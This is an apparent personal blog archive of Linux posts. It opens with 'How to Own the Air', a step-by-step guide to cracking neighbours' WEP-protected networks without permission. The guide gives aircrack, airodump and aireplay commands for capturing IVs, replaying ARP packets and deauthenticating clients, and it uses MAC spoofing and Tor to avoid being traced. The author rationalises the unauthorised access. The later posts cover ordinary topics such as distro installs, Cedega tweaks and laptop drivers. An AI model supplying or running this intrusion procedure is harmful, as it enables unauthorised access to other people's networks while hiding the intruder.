You are currently viewing all posts tagged with linux.

wireless, howto, crypto, linux

How to Own the Air

Before moving into my new place last month, I had planned on paying an ISP for internet access. But, complications arose with the company I had chosen, so I decided to cancel my order soon after it was placed. Instead, I planned to borrow internet access from my neighbors (hey, they’re pumping signals into my air-space). Trouble was, everyone had encrypted their networks with WEP. No doubt this is a good thing, and a vast improvement from the last time I had scanned down here (about 8 months ago), but I wanted in. I was able to justify cracking in to myself by recognizing that my paranoia isn’t limited just to the “others” out on the global interwebs – no, I’d be just as paranoid about the owner of whomever’s network I was breaking into watching my traffic. There was no question I’d make ample use of encryption, which, as a side benefit, meant that anything I did through his connection would be rather difficult to trace back. So, he was protected. As long as he wasn’t paying for bandwidth by the KB, he’d not be much affected by my leeching. (I use the pronoun “he” because I know now that the owner of my primary network is, in fact, a he – put a password on your routers, people!).

But there was another problem, in addition to WEP: during reconnaissance, I would rarely pick up any connected clients. Perhaps I was always trying at the wrong time of day. Or perhaps people pay for internet access and never use it. Regardless, it would have taken weeks of constant logging to gather enough IVs to crack the WEP key. So, the first step was to take the money I had saved by canceling my order with the ISP, and invest in a new wireless card that supported packet injection.

The Proxim 8470-WD (from aircrack-ng’s recommended list) caught my eye, though it took a while before I could find it a decent price. To do my initial cracking, I popped in Backtrack and followed aircrack-ng’s newbie guide. (I had upgraded my trusty old Auditor cd to Backtrack just for this occasion. It’s quite the nice distribution.) Within about 5 minutes, I had gained access to the first network. Goes to show how secure WEP is.

Though the Proxim card is plug and play in Ubuntu, the steps to crack WEP are a little different. Here’s what I do (note that I do recommend using Backtrack, instead).

First, of course, one must install aircrack:

sudo apt-get install aircrack

You may change your mac address manually, or, if you aren’t concerned with anonymity, don’t change it all. I have a preference of using the macchanger tool:

sudo apt-get install macchanger

Set your card’s MAC address randomly. In this case, the network device is at ath0:

sudo ifconfig ath0 down
sudo macchanger -r ath0
sudo ifconfig ath0 up

Put your card into monitor mode:

sudo iwconfig ath0 mode monitor

Start scanning:

sudo airodump ath0 dump 0

In this case, dump is the file prefix for airodump’s output and the 0 tells airodump to channel-hop. Now you want to pick your target network from the scan. It should have at least one client connected (displayed at the bottom of airodump’s output), the more the merrier. (Hopefully that client is transmitting data, too.)

When you pick your target, kill the first instance of airodump and start it up again, this time specifying the channel of your target:

sudo airodump ath0 targetdump 9

The targetdump is the file prefix and 9 is the channel. Optionally you can add a 1 to the end of the command, which tells airodump to only capture IVs (which is what you’re after). I normally don’t bother.

When you’ve captured somewhere in the range of 250,000 - 500,000 data packets (shown by airodump in the “Packets” column of your target client), you can start cracking:

aircrack -b 00:12:34:45:78:A3 targetdump.cap

In this case, -b is the essid of your target network. Cracking could take minutes, hours, days, weeks, months, or years. I’ve never had to wait over 20 minutes.

But what if the client is being a party-pooper and not transmitting? That’s where packet injection comes in. From aircrack’s guide:

ARP works (simplified) by broadcasting a query for an IP and the device that has this IP sends back an answer. Because WEP does not protect against replay, you can sniff a packet, send it out again and again and it is still valid. So you just have to capture and replay an ARP-request targeted at the AP to create lots of traffic (and sniff IVs).

You’ll want to keep airodump running, so that all the traffic you generate will be captured. In another terminal, start injecting:

sudo aireplay -3 -b 00:12:34:45:78:A3 -h A3:78:45:34:12:00 ath0

The -3 tells airepay you want to replay ARP requests, -b is that target network, and -h is the client. In a little bit, aireplay should inform you that it has captured 1 (or more) ARP packets. Sit back and watch airodump count up the IVs.

If that pesky client still isn’t cooperating, you can give it a little motivation. From aircrack:

Most operating systems clear the ARP cache on disconnection. If they want to send the next packet after reconnection (or just use DHCP), they have to send out ARP requests. So the idea is to disconnect a client and force it to reconnect to capture an ARP-request. A side-effect is that you can sniff the ESSID during reconnection too. This comes in handy if the ESSID of your target is hidden. ...the risk that someone recognizes this attack or at least attention is drawn to the stuff happening on the WLAN is higher than with other attacks.

Keep airodump and aireplay running, and in a new terminal give it a little kick in the butt:

sudo aireplay -0 5 -a 00:12:34:45:78:A3 -c A3:78:45:34:12:00 ath0

The first switch, -0, informs aireplay you want to force the client to be unauthenticated, -a is the target network, -c is the target client. When the client reconnects, you should start grabbing ARP requests.

After you have enough packets, crack the WEP key as before.

To manage and connect to my wireless networks, I’ve taken to using wifi-radar. It scans for networks, allows you to specify which networks you prefer and, for each network, allows you to set preferences such as the WEP key, whether to use dynamic or static addresses, and the like. What I like best is the connection commands, which allows you to set commands you want executed before wifi-radar connects to the network, and after. In the before field, I have it randomly change my mac address:

ifconfig ath0 down && macchanger -r ath0 && ifconfig ath0 up

After it connects, I restart tor:

/etc/init.d/tor restart

(As another reference for you, this site keeps turning up as a guide to cracking WEP in Ubuntu.)

linux

Ubuntu Dapper Beta

Yesterday, I decided to give the latest Ubuntu beta a go. I first tried to upgrade using Ubuntu’s update-manager, but, alas, GUIs never work. It crashed while trying to upgrade Kino, which also left me with a broken X server. I had downloaded the new Live CD beforehand, so I just booted into that and used the installer. The partitioning tool insisted that my new swap was to be only 1K, which I wasn’t too pleased with. After killing the installer, manually setting my partitions with fstab, and then rerunning the installer, everything worked fine. By the time I rebooted, there were already 65 packages to update. After that, I had to add in some new repos and install the usual additional software.

So far, I’m happy with the release. It seems a bit faster, looks much nicer, and, of course, has a whole slew of updated software.

linux

LinuxFest 2006

This year’s lineup for LinuxFest isn’t very impressive. It’s dissapointing. The first year I live only a few minutes away is the year that the speakers don’t interest me. I’m not sure if I’ll go.

linux

Pearle Vision runs Linux

I went into Pearle Vision today. When I was walking around the store, I accidentally bumped one of the computers. And what did I see? The XScreenSaver password prompt! Yes, Pearle Vision is running Linux. And not just in the backroom, these were the actual workstations out in the showroom. Cool stuff.

linux

Firefox/Thunderbird in slackware-current

Thanks to this post on LQ, I discovered that Firefox and Thunderbird have been added to slackware-current. Sweetness. Now I just hope that the next version ships with 2.6 as default so I don’t have to upgrade whenever I install.

linux

Cedega Tweaks

There’s a nice Cedega Tweaking Guide over at LinuxGamers. It’s meant for Half-Life 2, but most of the tweaks apply to all games. I did the following

Some distributions need to set up a System-Variable. First, you have to examine if it is set. cat /proc/sys/vm/legacy_va_layout No output means, that this Variable isn't set. As root: echo 1 > /proc/sys/vm/legacy_va_layout This setting only survives up to the next reboot. To set up this Variable permanently, open your /etc/sysctl.conf and append vm.legacy_va_layout = 1
VIDEORAM Don't forget to set Videoram and AGPVertexRAM to the values of your graphics card. Read the description in the config file and in the release notes of Cedega. The best value for Videocards with 256MB of Videoram is: "VideoRam" = "256" and "AGPVertexRam" = "128" Use adjusted values after this pattern for cards with less memory. ALSA If you have ALSA then use the winealsa.drv of Cedega. It will give you a small FPS boost. Open ~/.transgaming/config or ~/.point2play//config and edit the [WinMM] section to "Driver" = "winealsa.drv"
linux

Dell 8600

I have a new laptop, a Dell Inspiron 8600. The specs are as follows:

  • Intel Pentium M 755 (2GHz/400MHz FSB) 15.4 WSXGA+
  • 1GB DDR SDRAM (2 Dimms)
  • 64MB DDR Nvidia GeForce FX Go5200
  • 8x CD/DVD burner (DVD+/-RW) w/ double-layer writing capability
  • 100GB Hard Drive
  • Integrated 10/100 NIC/Modem
  • Intel Pro/Wireless 2200 Internal (802.11b/g, 54Mbps)

I lucked out with the video card. Granted 64mb isn’t too hot, but ATI Linux support is dicey, so I wanted an Nvidia. Nick is also looking to get a new laptop and he discovered a few days ago that Dell is no longer selling the 8600 with Nvidia cards (probably why I got 25% off).

When I got the thing it was running Windows XP. Of course I wanted Linux. I wasn’t quite sure what distro I wanted to put on it, but I was leaning towards Slack.

The first order of business was to burn the Slackware 10.1 ISOs I’d downloaded earlier. I swear I was in Windows for at least 45 minutes trying to figure out how to burn a damn ISO. After that I just got fed up with it, formatted and installed Suse (which, by the way, resized and kept the Windows partitions. Interesting). After about three seconds in Suse I was burning the images. And they call Windows user-friendly…

The next few hours were spent distro-whoring. I went through Suse, Ubuntu, Gentoo, and Slackware, finally settling on Slack.

Getting everything to work in Slackware took a little work, but wasn’t too much trouble.

The first thing was, of course, to install the Nvidia drivers. Grabbing them off Nvidia’s site and installing them the normal way works fine (ignore the warning the installer gives about the conflicting rivafb module). My trouble was getting X to load after that. With the help of Google, I was able to make a custom xorg.conf that worked just dandy.

The second thing I wanted working was the wireless, which uses the ipw2200 module. I don’t know if it supports kernel 2.4, but I couldn’t get it working without upgrading to 2.6 (slackware 10.1 still ships with 2.4, with 2.6 in /testing).

Upgrading to 2.6 is easy. Simply read the README.initrd in /testing/packages/linux-2.6.10/. In the step that has you installpkg everything, I’d also add kernel-source (44MB).

When I got 2.6 running, it was a simple matter of doing make, make install on ipw2200. Then I extracted the firmware to /lib/firmware. After that finishes:

modprobe ipw2200
iwconfig
dhcpcd eth0

Also, reading the iwconfig man page is helpful.

Now the wireless is running. To switch back to the wired connection, do a

modprobe -r ipw2200
modprobe b44
ifconfig eth0 up

The next thing was sound. Since I’d upgraded to 2.6, I needed to install the new alsa-drivers. After that, there’s the problem of a conflicting module named snd_intel8x0m (something to do with modem sound). That needs to be removed and added to the blacklist.

modprobe -r snd_intel8x0m
pico /etc/hotplug/blacklist

Now all that’s left to do is run alsaconf and alsamixer to adjust volume.

It’s been running great for a few days now. The only thing I’m still working on is getting ACPI fully working (i.e. making the screen turn off when it’s closed).

linux

Job Shadow

I was able to skip school today and job shadow at Intermec. I shadowed two UNIX admins for most of the day. It was good times. I learned a lot, played with new toys, and spent time in the GNOC (global network operations center). They were surprised I knew anything about Linux (I turned a couple people on to Slackware and Gentoo), and the engineering guys want me to work for them.

In other news, being in the mall when the power goes out is cool.